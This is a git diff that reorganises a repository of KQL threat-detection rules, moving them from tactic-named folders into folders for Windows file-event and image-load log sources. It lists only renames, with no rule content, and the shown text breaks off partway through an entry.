diff --git a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_write_to_system32_tasks.kql b/KQL/rules/windows/file/file_event/suspicious_scheduled_task_write_to_system32_tasks.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/suspicious_scheduled_task_write_to_system32_tasks.kql
rename to KQL/rules/windows/file/file_event/suspicious_scheduled_task_write_to_system32_tasks.kql
diff --git a/KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql b/KQL/rules/windows/file/file_event/suspicious_screensaver_binary_file_creation.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql
rename to KQL/rules/windows/file/file_event/suspicious_screensaver_binary_file_creation.kql
diff --git a/KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql b/KQL/rules/windows/file/file_event/suspicious_startup_folder_persistence.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql
rename to KQL/rules/windows/file/file_event/suspicious_startup_folder_persistence.kql
diff --git a/KQL/rules/Command and Control/teamviewer_remote_session.kql b/KQL/rules/windows/file/file_event/teamviewer_remote_session.kql
similarity index 100%
rename from KQL/rules/Command and Control/teamviewer_remote_session.kql
rename to KQL/rules/windows/file/file_event/teamviewer_remote_session.kql
diff --git a/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_abusing_winsat_path_parsing_file.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_file.kql
rename to KQL/rules/windows/file/file_event/uac_bypass_abusing_winsat_path_parsing_file.kql
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_consent_and_comctl32_file.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_file.kql
rename to KQL/rules/windows/file/file_event/uac_bypass_using_consent_and_comctl32_file.kql
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_eventvwr.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_eventvwr.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uac_bypass_using_eventvwr.kql
rename to KQL/rules/windows/file/file_event/uac_bypass_using_eventvwr.kql
diff --git a/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_idiagnostic_profile_file.kql
similarity index 100%
rename from KQL/rules/Execution/uac_bypass_using_idiagnostic_profile_file.kql
rename to KQL/rules/windows/file/file_event/uac_bypass_using_idiagnostic_profile_file.kql
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_ieinstal_file.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_file.kql
rename to KQL/rules/windows/file/file_event/uac_bypass_using_ieinstal_file.kql
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_msconfig_token_modification_file.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_file.kql
rename to KQL/rules/windows/file/file_event/uac_bypass_using_msconfig_token_modification_file.kql
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_net_code_profiler_on_mmc.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_net_code_profiler_on_mmc.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uac_bypass_using_net_code_profiler_on_mmc.kql
rename to KQL/rules/windows/file/file_event/uac_bypass_using_net_code_profiler_on_mmc.kql
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_ntfs_reparse_point_file.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_file.kql
rename to KQL/rules/windows/file/file_event/uac_bypass_using_ntfs_reparse_point_file.kql
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_windows_media_player_file.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_file.kql
rename to KQL/rules/windows/file/file_event/uac_bypass_using_windows_media_player_file.kql
diff --git a/KQL/rules/Persistence/uefi_persistence_via_wpbbin_filecreation.kql b/KQL/rules/windows/file/file_event/uefi_persistence_via_wpbbin_filecreation.kql
similarity index 100%
rename from KQL/rules/Persistence/uefi_persistence_via_wpbbin_filecreation.kql
rename to KQL/rules/windows/file/file_event/uefi_persistence_via_wpbbin_filecreation.kql
diff --git a/KQL/rules/Resource Development/uncommon_file_created_in_office_startup_folder.kql b/KQL/rules/windows/file/file_event/uncommon_file_created_in_office_startup_folder.kql
similarity index 100%
rename from KQL/rules/Resource Development/uncommon_file_created_in_office_startup_folder.kql
rename to KQL/rules/windows/file/file_event/uncommon_file_created_in_office_startup_folder.kql
diff --git a/KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql b/KQL/rules/windows/file/file_event/uncommon_file_creation_by_mysql_daemon_process.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql
rename to KQL/rules/windows/file/file_event/uncommon_file_creation_by_mysql_daemon_process.kql
diff --git a/KQL/rules/Resource Development/vhd_image_download_via_browser.kql b/KQL/rules/windows/file/file_event/vhd_image_download_via_browser.kql
similarity index 100%
rename from KQL/rules/Resource Development/vhd_image_download_via_browser.kql
rename to KQL/rules/windows/file/file_event/vhd_image_download_via_browser.kql
diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql b/KQL/rules/windows/file/file_event/visual_studio_code_tunnel_remote_file_creation.kql
similarity index 100%
rename from KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql
rename to KQL/rules/windows/file/file_event/visual_studio_code_tunnel_remote_file_creation.kql
diff --git a/KQL/rules/Persistence/vscode_powershell_profile_modification.kql b/KQL/rules/windows/file/file_event/vscode_powershell_profile_modification.kql
similarity index 100%
rename from KQL/rules/Persistence/vscode_powershell_profile_modification.kql
rename to KQL/rules/windows/file/file_event/vscode_powershell_profile_modification.kql
diff --git a/KQL/rules/Credential Access/werfault_lsass_process_memory_dump.kql b/KQL/rules/windows/file/file_event/werfault_lsass_process_memory_dump.kql
similarity index 100%
rename from KQL/rules/Credential Access/werfault_lsass_process_memory_dump.kql
rename to KQL/rules/windows/file/file_event/werfault_lsass_process_memory_dump.kql
diff --git a/KQL/rules/Defense Evasion/windows_binaries_write_suspicious_extensions.kql b/KQL/rules/windows/file/file_event/windows_binaries_write_suspicious_extensions.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/windows_binaries_write_suspicious_extensions.kql
rename to KQL/rules/windows/file/file_event/windows_binaries_write_suspicious_extensions.kql
diff --git a/KQL/rules/Execution/windows_shell_scripting_application_file_write_to_suspicious_folder.kql b/KQL/rules/windows/file/file_event/windows_shell_scripting_application_file_write_to_suspicious_folder.kql
similarity index 100%
rename from KQL/rules/Execution/windows_shell_scripting_application_file_write_to_suspicious_folder.kql
rename to KQL/rules/windows/file/file_event/windows_shell_scripting_application_file_write_to_suspicious_folder.kql
diff --git a/KQL/rules/Privilege Escalation/windows_terminal_profile_settings_modification_by_uncommon_process.kql b/KQL/rules/windows/file/file_event/windows_terminal_profile_settings_modification_by_uncommon_process.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/windows_terminal_profile_settings_modification_by_uncommon_process.kql
rename to KQL/rules/windows/file/file_event/windows_terminal_profile_settings_modification_by_uncommon_process.kql
diff --git a/KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql b/KQL/rules/windows/file/file_event/winrar_creating_files_in_startup_locations.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql
rename to KQL/rules/windows/file/file_event/winrar_creating_files_in_startup_locations.kql
diff --git a/KQL/rules/Execution/winsxs_executable_file_creation_by_non_system_process.kql b/KQL/rules/windows/file/file_event/winsxs_executable_file_creation_by_non_system_process.kql
similarity index 100%
rename from KQL/rules/Execution/winsxs_executable_file_creation_by_non_system_process.kql
rename to KQL/rules/windows/file/file_event/winsxs_executable_file_creation_by_non_system_process.kql
diff --git a/KQL/rules/Privilege Escalation/wmi_persistence_script_event_consumer_file_write.kql b/KQL/rules/windows/file/file_event/wmi_persistence_script_event_consumer_file_write.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/wmi_persistence_script_event_consumer_file_write.kql
rename to KQL/rules/windows/file/file_event/wmi_persistence_script_event_consumer_file_write.kql
diff --git a/KQL/rules/Lateral Movement/wmiexec_default_output_file.kql b/KQL/rules/windows/file/file_event/wmiexec_default_output_file.kql
similarity index 100%
rename from KQL/rules/Lateral Movement/wmiexec_default_output_file.kql
rename to KQL/rules/windows/file/file_event/wmiexec_default_output_file.kql
diff --git a/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack_file.kql b/KQL/rules/windows/file/file_event/wmiprvse_wbemcomn_dll_hijack_file.kql
similarity index 100%
rename from KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack_file.kql
rename to KQL/rules/windows/file/file_event/wmiprvse_wbemcomn_dll_hijack_file.kql
diff --git a/KQL/rules/Privilege Escalation/writing_local_admin_share.kql b/KQL/rules/windows/file/file_event/writing_local_admin_share.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/writing_local_admin_share.kql
rename to KQL/rules/windows/file/file_event/writing_local_admin_share.kql
diff --git a/KQL/rules/Execution/wscript_or_cscript_dropper_file.kql b/KQL/rules/windows/file/file_event/wscript_or_cscript_dropper_file.kql
similarity index 100%
rename from KQL/rules/Execution/wscript_or_cscript_dropper_file.kql
rename to KQL/rules/windows/file/file_event/wscript_or_cscript_dropper_file.kql
diff --git a/KQL/rules/Execution/abusable_dll_potential_sideloading_from_suspicious_location.kql b/KQL/rules/windows/image_load/abusable_dll_potential_sideloading_from_suspicious_location.kql
similarity index 100%
rename from KQL/rules/Execution/abusable_dll_potential_sideloading_from_suspicious_location.kql
rename to KQL/rules/windows/image_load/abusable_dll_potential_sideloading_from_suspicious_location.kql
diff --git a/KQL/rules/Defense Evasion/amsi_dll_loaded_via_lolbin_process.kql b/KQL/rules/windows/image_load/amsi_dll_loaded_via_lolbin_process.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/amsi_dll_loaded_via_lolbin_process.kql
rename to KQL/rules/windows/image_load/amsi_dll_loaded_via_lolbin_process.kql
diff --git a/KQL/rules/Defense Evasion/aruba_network_service_potential_dll_sideloading.kql b/KQL/rules/windows/image_load/aruba_network_service_potential_dll_sideloading.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/aruba_network_service_potential_dll_sideloading.kql
rename to KQL/rules/windows/image_load/aruba_network_service_potential_dll_sideloading.kql
diff --git a/KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql b/KQL/rules/windows/image_load/baaupdate_exe_suspicious_dll_load.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql
rename to KQL/rules/windows/image_load/baaupdate_exe_suspicious_dll_load.kql
diff --git a/KQL/rules/Execution/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql b/KQL/rules/windows/image_load/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql
similarity index 100%
rename from KQL/rules/Execution/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql
rename to KQL/rules/windows/image_load/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql
diff --git a/KQL/rules/Execution/clr_dll_loaded_via_office_applications.kql b/KQL/rules/windows/image_load/clr_dll_loaded_via_office_applications.kql
similarity index 100%
rename from KQL/rules/Execution/clr_dll_loaded_via_office_applications.kql
rename to KQL/rules/windows/image_load/clr_dll_loaded_via_office_applications.kql
diff --git a/KQL/rules/Credential Access/credui_dll_loaded_by_uncommon_process.kql b/KQL/rules/windows/image_load/credui_dll_loaded_by_uncommon_process.kql
similarity index 100%
rename from KQL/rules/Credential Access/credui_dll_loaded_by_uncommon_process.kql
rename to KQL/rules/windows/image_load/credui_dll_loaded_by_uncommon_process.kql
diff --git a/KQL/rules/Defense Evasion/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql b/KQL/rules/windows/image_load/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql
rename to KQL/rules/windows/image_load/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql
diff --git a/KQL/rules/Defense Evasion/dll_load_by_system_process_from_suspicious_locations.kql b/KQL/rules/windows/image_load/dll_load_by_system_process_from_suspicious_locations.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/dll_load_by_system_process_from_suspicious_locations.kql
rename to KQL/rules/windows/image_load/dll_load_by_system_process_from_suspicious_locations.kql
diff --git a/KQL/rules/Defense Evasion/dll_loaded_from_suspicious_location_via_cmspt_exe.kql b/KQL/rules/windows/image_load/dll_loaded_from_suspicious_location_via_cmspt_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/dll_loaded_from_suspicious_location_via_cmspt_exe.kql
rename to KQL/rules/windows/image_load/dll_loaded_from_suspicious_location_via_cmspt_exe.kql
diff --git a/KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql b/KQL/rules/windows/image_load/dll_sideloading_of_shellchromeapi_dll.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql
rename to KQL/rules/windows/image_load/dll_sideloading_of_shellchromeapi_dll.kql
diff --git a/KQL/rules/Execution/dotnet_assembly_dll_loaded_via_office_application.kql b/KQL/rules/windows/image_load/dotnet_assembly_dll_loaded_via_office_application.kql
similarity index 100%
rename from KQL/rules/Execution/dotnet_assembly_dll_loaded_via_office_application.kql
rename to KQL/rules/windows/image_load/dotnet_assembly_dll_loaded_via_office_application.kql
diff --git a/KQL/rules/Defense Evasion/dotnet_clr_dll_loaded_by_scripting_applications.kql b/KQL/rules/windows/image_load/dotnet_clr_dll_loaded_by_scripting_applications.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/dotnet_clr_dll_loaded_by_scripting_applications.kql
rename to KQL/rules/windows/image_load/dotnet_clr_dll_loaded_by_scripting_applications.kql
diff --git a/KQL/rules/Privilege Escalation/fax_service_dll_search_order_hijack.kql b/KQL/rules/windows/image_load/fax_service_dll_search_order_hijack.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/fax_service_dll_search_order_hijack.kql
rename to KQL/rules/windows/image_load/fax_service_dll_search_order_hijack.kql
diff --git a/KQL/rules/Execution/gac_dll_loaded_via_office_applications.kql b/KQL/rules/windows/image_load/gac_dll_loaded_via_office_applications.kql
similarity index 100%
rename from KQL/rules/Execution/gac_dll_loaded_via_office_applications.kql
rename to KQL/rules/windows/image_load/gac_dll_loaded_via_office_applications.kql
diff --git a/KQL/rules/Command and Control/hacktool_silenttrinity_stager_dll_load.kql b/KQL/rules/windows/image_load/hacktool_silenttrinity_stager_dll_load.kql
similarity index 100%
rename from KQL/rules/Command and Control/hacktool_silenttrinity_stager_dll_load.kql
rename to KQL/rules/windows/image_load/hacktool_silenttrinity_stager_dll_load.kql
diff --git a/KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql b/KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_a_suspicious_process.kql
similarity index 100%
rename from KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql
rename to KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_a_suspicious_process.kql
diff --git a/KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql b/KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_an_uncommon_process.kql
similarity index 100%
rename from KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql
rename to KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_an_uncommon_process.kql
diff --git a/KQL/rules/Execution/microsoft_excel_add_in_loaded_from_uncommon_location.kql b/KQL/rules/windows/image_load/microsoft_excel_add_in_loaded_from_uncommon_location.kql
similarity index 100%
rename from KQL/rules/Execution/microsoft_excel_add_in_loaded_from_uncommon_location.kql
rename to KQL/rules/windows/image_load/microsoft_excel_add_in_loaded_from_uncommon_location.kql
diff --git a/KQL/rules/Defense Evasion/microsoft_office_dll_sideload.kql b/KQL/rules/windows/image_load/microsoft_office_dll_sideload.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/microsoft_office_dll_sideload.kql
rename to KQL/rules/windows/image_load/microsoft_office_dll_sideload.kql
diff --git a/KQL/rules/Execution/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql b/KQL/rules/windows/image_load/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql
similarity index 100%
rename from KQL/rules/Execution/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql
rename to KQL/rules/windows/image_load/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql
diff --git a/KQL/rules/Execution/mmc_loading_script_engines_dlls.kql b/KQL/rules/windows/image_load/mmc_loading_script_engines_dlls.kql
similarity index 100%
rename from KQL/rules/Execution/mmc_loading_script_engines_dlls.kql
rename to KQL/rules/windows/image_load/mmc_loading_script_engines_dlls.kql
diff --git a/KQL/rules/Execution/pcre_net_package_image_load.kql b/KQL/rules/windows/image_load/pcre_net_package_image_load.kql
similarity index 100%
rename from KQL/rules/Execution/pcre_net_package_image_load.kql
rename to KQL/rules/windows/image_load/pcre_net_package_image_load.kql
diff --git a/KQL/rules/Defense Evasion/potential_7za_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_7za_dll_sideloading.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_7za_dll_sideloading.kql
rename to KQL/rules/windows/image_load/potential_7za_dll_sideloading.kql
diff --git a/KQL/rules/Defense Evasion/potential_antivirus_software_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_antivirus_software_dll_sideloading.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_antivirus_software_dll_sideloading.kql
rename to KQL/rules/windows/image_load/potential_antivirus_software_dll_sideloading.kql
diff --git a/KQL/rules/Persistence/potential_appverifui_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_appverifui_dll_sideloading.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_appverifui_dll_sideloading.kql
rename to KQL/rules/windows/image_load/potential_appverifui_dll_sideloading.kql
diff --git a/KQL/rules/Persistence/potential_avkkid_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_avkkid_dll_sideloading.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_avkkid_dll_sideloading.kql
rename to KQL/rules/windows/image_load/potential_avkkid_dll_sideloading.kql
diff --git a/KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql b/KQL/rules/windows/image_load/potential_azure_browser_sso_abuse.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql
rename to KQL/rules/windows/image_load/potential_azure_browser_sso_abuse.kql
diff --git a/KQL/rules/Defense Evasion/potential_ccleanerdu_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_ccleanerdu_dll_sideloading.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_ccleanerdu_dll_sideloading.kql
rename to KQL/rules/windows/image_load/potential_ccleanerdu_dll_sideloading.kql
diff --git a/KQL/rules/Defense Evasion/potential_ccleanerreactivator_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_ccleanerreactivator_dll_sideloading.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_ccleanerreactivator_dll_sideloading.kql
rename to KQL/rules/windows/image_load/potential_ccleanerreactivator_dll_sideloading.kql
diff --git a/KQL/rules/Defense Evasion/potential_chrome_frame_helper_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_chrome_frame_helper_dll_sideloading.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_chrome_frame_helper_dll_sideloading.kql
rename to KQL/rules/windows/image_load/potential_chrome_frame_helper_dll_sideloading.kql
diff --git a/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql b/KQL/rules/windows/image_load/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql
similarity index 100%
rename from KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql
rename to KQL/rules/windows/image_load/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql
diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbgcore_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_of_dbgcore_dll.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbgcore_dll.kql
rename to KQL/rules/windows/image_load/potential_dll_sideloading_of_dbgcore_dll.kql
diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbghelp_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_of_dbghelp_dll.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbghelp_dll.kql
rename to KQL/rules/windows/image_load/potential_dll_sideloading_of_dbghelp_dll.kql
diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_dbgmodel_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_of_dbgmodel_dll.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/potential_dll_sideloading_of_dbgmodel_dll.kql
rename to KQL/rules/windows/image_load/potential_dll_sideloading_of_dbgmodel_dll.kql
diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql
rename to KQL/rules/windows/image_load/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql
diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mpsvc_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_of_mpsvc_dll.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mpsvc_dll.kql
rename to KQL/rules/windows/image_load/potential_dll_sideloading_of_mpsvc_dll.kql
diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mscorsvc_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_of_mscorsvc_dll.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mscorsvc_dll.kql
rename to KQL/rules/windows/image_load/potential_dll_sideloading_of_mscorsvc_dll.kql
diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_using_coregen_exe.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_using_coregen_exe.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/potential_dll_sideloading_using_coregen_exe.kql
rename to KQL/rules/windows/image_load/potential_dll_sideloading_using_coregen_exe.kql
diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_via_classicexplorer32_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_via_classicexplorer32_dll.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_dll_sideloading_via_classicexplorer32_dll.kql
rename to KQL/rules/windows/image_load/potential_dll_sideloading_via_classicexplorer32_dll.kql
diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_via_comctl32_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_via_comctl32_dll.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_dll_sideloading_via_comctl32_dll.kql
rename to KQL/rules/windows/image_load/potential_dll_sideloading_via_comctl32_dll.kql
diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_via_jsschhlp.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_via_jsschhlp.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_dll_sideloading_via_jsschhlp.kql
rename to KQL/rules/windows/image_load/potential_dll_sideloading_via_jsschhlp.kql
diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_vmware_xfer.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_via_vmware_xfer.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/potential_dll_sideloading_via_vmware_xfer.kql
rename to KQL/rules/windows/image_load/potential_dll_sideloading_via_vmware_xfer.kql
diff --git a/KQL/rules/Persistence/potential_eacore_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_eacore_dll_sideloading.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_eacore_dll_sideloading.kql
rename to KQL/rules/windows/image_load/potential_eacore_dll_sideloading.kql
diff --git a/KQL/rules/Persistence/potential_edputil_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_edputil_dll_sideloading.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_edputil_dll_sideloading.kql
rename to KQL/rules/windows/image_load/potential_edputil_dll_sideloading.kql
diff --git a/KQL/rules/Persistence/potential_goopdate_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_goopdate_dll_sideloading.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_goopdate_dll_sideloading.kql
rename to KQL/rules/windows/image_load/potential_goopdate_dll_sideloading.kql
diff --git a/KQL/rules/Persistence/potential_iviewers_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_iviewers_dll_sideloading.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_iviewers_dll_sideloading.kql
rename to KQL/rules/windows/image_load/potential_iviewers_dll_sideloading.kql
diff --git a/KQL/rules/Defense Evasion/potential_libvlc_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_libvlc_dll_sideloading.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_libvlc_dll_sideloading.kql
rename to KQL/rules/windows/image_load/potential_libvlc_dll_sideloading.kql
diff --git a/KQL/rules/Persistence/potential_mfdetours_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_mfdetours_dll_sideloading.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_mfdetours_dll_sideloading.kql
rename to KQL/rules/windows/image_load/potential_mfdetours_dll_sideloading.kql
diff --git a/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_mpclient_dll_sideloading.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading.kql
rename to KQL/rules/windows/image_load/potential_mpclient_dll_sideloading.kql
diff --git a/KQL/rules/Persistence/potential_rcdll_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_rcdll_dll_sideloading.kql similarity index 100% rename from KQL/rules/Persistence/potential_rcdll_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_rcdll_dll_sideloading.kql diff --git a/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_default_location.kql b/KQL/rules/windows/image_load/potential_rjvplatform_dll_sideloading_from_default_location.kql similarity index 100% rename from KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_default_location.kql rename to KQL/rules/windows/image_load/potential_rjvplatform_dll_sideloading_from_default_location.kql diff --git a/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_non_default_location.kql b/KQL/rules/windows/image_load/potential_rjvplatform_dll_sideloading_from_non_default_location.kql similarity index 100% rename from KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_non_default_location.kql rename to KQL/rules/windows/image_load/potential_rjvplatform_dll_sideloading_from_non_default_location.kql diff --git a/KQL/rules/Persistence/potential_roboform_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_roboform_dll_sideloading.kql similarity index 100% rename from KQL/rules/Persistence/potential_roboform_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_roboform_dll_sideloading.kql diff --git a/KQL/rules/Persistence/potential_shelldispatch_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_shelldispatch_dll_sideloading.kql similarity index 100% rename from KQL/rules/Persistence/potential_shelldispatch_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_shelldispatch_dll_sideloading.kql 
diff --git a/KQL/rules/Persistence/potential_smadhook_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_smadhook_dll_sideloading.kql similarity index 100% rename from KQL/rules/Persistence/potential_smadhook_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_smadhook_dll_sideloading.kql diff --git a/KQL/rules/Persistence/potential_solidpdfcreator_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_solidpdfcreator_dll_sideloading.kql similarity index 100% rename from KQL/rules/Persistence/potential_solidpdfcreator_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_solidpdfcreator_dll_sideloading.kql diff --git a/KQL/rules/Defense Evasion/potential_system_dll_sideloading_from_non_system_locations.kql b/KQL/rules/windows/image_load/potential_system_dll_sideloading_from_non_system_locations.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_system_dll_sideloading_from_non_system_locations.kql rename to KQL/rules/windows/image_load/potential_system_dll_sideloading_from_non_system_locations.kql diff --git a/KQL/rules/Persistence/potential_vivaldi_elf_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_vivaldi_elf_dll_sideloading.kql similarity index 100% rename from KQL/rules/Persistence/potential_vivaldi_elf_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_vivaldi_elf_dll_sideloading.kql diff --git 